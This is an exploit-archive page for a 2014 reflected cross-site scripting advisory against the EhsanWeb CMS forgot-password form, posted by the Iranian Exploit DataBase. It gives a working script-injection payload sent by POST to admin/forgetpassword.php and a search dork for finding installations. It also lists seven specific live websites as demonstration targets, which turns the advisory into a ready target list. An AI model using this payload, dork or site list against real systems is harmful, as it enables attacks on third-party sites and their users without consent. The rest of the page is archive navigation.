EhsanWeb Cross Site Scripting

EhsanWeb Cross Site Scripting: Posted Aug 30, 2014; Authored by IeDb; EhsanWeb suffers from a reflective cross site scripting vulnerability in the forgot password flow. Note that this finding houses site-specific data.; tags | exploit, xss; SHA-256 | 29138f17af825bcde7951a3727aed93db07923cad7c6aef04cf1ada9b5fc9038; Download | Favorite | View

EhsanWeb Cross Site Scripting

Cross-Site Scripting Vulnerability in ehsanweb CMS

--



*** Iranian Exploit DataBase ***

*            ** http://iedb.ir <http://exploit.iedb.ir> ***

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@
 @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@
 @@@@@@@@
#     @@@    @@@            @@@    @@       @@@       @@          @@@
 @@@  @@@
#     @@@    @@@            @@@      @@     @@@     @@            @@@
 @@@  @@@
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@
 @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@
 @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@
 @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@
 @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@
 @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# ehsanweb CMS Cross-Site Scripting Vulnerability

# Vendor site : http://www.ehsanweb.com

# Dork : "????? ? ?????? ?????: ????? ??"

# Author : IeDb

# Site : Www.IeDb.Ir/acc   -   Www.IrIsT.Ir

# Fb Page : https://www.facebook.com/iedb.ir

#####################################

Bug :

http://www.site.com/admin/forgetpassword.php

POST :

email="><script>alert(/amir/)</script>

Image : http://upload.tehran98.com/upme/uploads/1ed2e1296fe441df1.jpg

Dem0 :

http://www.ehsanweb.com/admin/forgetpassword.php?process
http://pgshco.com/admin/forgetpassword.php?process
http://www.sapno.ir/admin/forgetpassword.php?process
http://abzarmajid.com/admin/forgetpassword.php?process
http://www.danavc.com/admin/forgetpassword.php?process
http://lotuscard.ir/admin/forgetpassword.php?process
http://www.asregorgan.ir/admin/forgetpassword.php?process

#####################################

# Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - Bl4ck N3T - dr.koderz -
 Enddo - E1.Coders - Behnam Vanda

# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil -
 z3r0 - 0x0ptim0us - 0Day

# Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar
 shahinzadeh - Khashayar

#  tootro20 - AmirMasoud And All Members In IeDb.Ir/acc

#####################################

#  Archive Exploit = http://www.iedb.ir/exploits-1903.html

#####################################

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 55 files
LiquidWorm 20 files
Debian 18 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

EhsanWeb Cross Site Scripting

EhsanWeb Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EhsanWeb Cross Site Scripting

Share This

EhsanWeb Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems